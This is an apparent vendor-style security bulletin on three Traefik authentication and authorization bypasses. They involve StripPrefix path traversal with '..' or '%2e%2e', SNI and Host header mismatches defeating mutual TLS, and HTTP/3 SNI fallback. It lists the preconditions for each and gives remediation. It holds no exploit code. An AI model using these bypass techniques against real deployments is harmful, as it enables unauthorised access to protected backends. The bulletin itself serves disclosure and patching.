SB2026070350 - Multiple vulnerabilities in Traefik



SB2026070350 - Multiple vulnerabilities in Traefik

Published: July 3, 2026

Security Bulletin ID SB2026070350
CSH Severity
High
Patch available
YES
Number of vulnerabilities 3
Exploitation vector Remote access
Highest impact Data manipulation

Breakdown by Severity

High 100%
  • Low
  • Medium
  • High
  • Critical

Description

This security bulletin contains information about 3 vulnerabilities.


1) Incorrect authorization (CVE-ID: CVE-2026-48020)

CWE-ID: CWE-863 - Incorrect Authorization

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to bypass route-level authentication and authorization and access protected backend paths.

The vulnerability exists due to incorrect authorization in the StripPrefix middleware when processing request paths containing .. or percent-encoded %2e%2e with PathPrefix-based public routes. A remote attacker can send a specially crafted request to bypass route-level authentication and authorization and access protected backend paths.

Exploitation requires a configuration where a public router uses PathPrefix together with StripPrefix and a separate router protects backend paths such as admin or internal endpoints.


2) Authentication bypass using an alternate path or channel (CVE-ID: CVE-2026-48491)

CWE-ID: CWE-288 - Authentication Bypass Using an Alternate Path or Channel

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to bypass mutual TLS authentication and access protected backends.

The vulnerability exists due to improper authentication in SNICheck when resolving TLSOptions for wildcard host rules during domain-fronted HTTPS or HTTP/2 requests. A remote attacker can complete a TLS handshake using a permissive SNI and then send a crafted Host header targeting a wildcard-protected backend to bypass mutual TLS authentication and access protected backends.

Exploitation requires a wildcard-protected router with stricter TLS options and another permissive SNI served on the same entrypoint.


3) Authentication bypass using an alternate path or channel (CVE-ID: CVE-2026-53622)

CWE-ID: CWE-288 - Authentication Bypass Using an Alternate Path or Channel

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to bypass client certificate authentication and access protected backends.

The vulnerability exists due to authentication bypass using an alternate path or channel in the HTTP/3 TLS configuration selection logic when handling QUIC handshakes for wildcard or mixed-case hostnames. A remote attacker can send a crafted HTTP/3 request with an SNI value that causes fallback to the default TLS configuration to bypass client certificate authentication and access protected backends.

Exploitation requires HTTP/3 to be enabled on the affected entrypoint, router-specific TLSOptions to enforce client certificate authentication, a weaker default TLS configuration, and attacker reachability to the UDP entrypoint.


Remediation

Install update from vendor's website.